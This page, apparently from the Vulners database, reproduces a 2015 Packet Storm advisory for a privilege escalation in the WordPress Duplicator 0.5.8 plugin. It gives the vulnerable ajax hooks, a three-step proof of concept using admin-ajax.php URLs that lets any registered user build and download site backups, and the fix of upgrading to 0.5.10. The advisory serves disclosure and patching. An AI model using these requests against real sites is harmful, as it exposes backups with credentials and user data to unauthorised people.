Lucene search
K

WordPress Duplicator 0.5.8 Privilege Escalation

🗓️ 18 Feb 2015 00:00:00Reported by Kacper SzurekType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

WordPress Duplicator 0.5.8 Privilege Escalation allows registered users to create and download backup files. Upgrade to version 0.5.10

Code
`# Exploit Title: Duplicator 0.5.8 Privilege Escalation  
# Date: 21-11-2014  
# Software Link: https://wordpress.org/plugins/duplicator/  
# Exploit Author: Kacper Szurek  
# Contact: http://twitter.com/KacperSzurek  
# Website: http://security.szurek.pl/  
# Category: webapps  
  
1. Description  
  
Every registered user can create and download backup files.  
  
File: duplicator\duplicator.php  
add_action('wp_ajax_duplicator_package_scan', 'duplicator_package_scan');  
add_action('wp_ajax_duplicator_package_build', 'duplicator_package_build');  
add_action('wp_ajax_duplicator_package_delete', 'duplicator_package_delete');  
add_action('wp_ajax_duplicator_package_report', 'duplicator_package_report');  
  
http://security.szurek.pl/duplicator-058-privilege-escalation.html  
  
2. Proof of Concept  
  
Login as regular user (created using wp-login.php?action=register) then start scan:  
  
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan  
  
After that you can build backup:  
  
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build  
  
This function will return json with backup name inside File key.  
  
You can download backup using:  
  
http://wordpress-url/wp-snapshots/%file_name_from_json%  
  
3. Solution:  
  
Update to version 0.5.10  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Feb 2015 00:00Current
7.4High risk
Vulners AI Score7.4
24